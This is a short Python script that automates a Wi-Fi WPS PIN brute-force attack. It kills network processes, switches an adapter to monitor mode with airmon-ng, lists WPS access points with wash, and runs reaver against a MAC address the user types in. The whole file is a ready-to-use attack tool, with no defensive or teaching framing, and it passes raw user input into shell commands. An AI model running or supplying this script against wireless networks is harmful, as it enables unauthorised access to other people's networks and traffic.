#!/usr/bin/python
import os
import socket

os.system("clear")
os.system("airmon-ng check kill")
os.system("iwconfig")
WLANinput=raw_input("\nEnter your adapter name:")
os.system("airmon-ng start " + WLANinput)
os.system("echo Control+C when your done looking")
os.system("wash -i " + WLANinput)
MACinput=raw_input("\nEnter MAC Address for Accesspoint:")
os.system("reaver -i " + WLANinput + " -b " + MACinput + " -d 45 -S -N -W -vv -l 60 -x 10 -r 5")
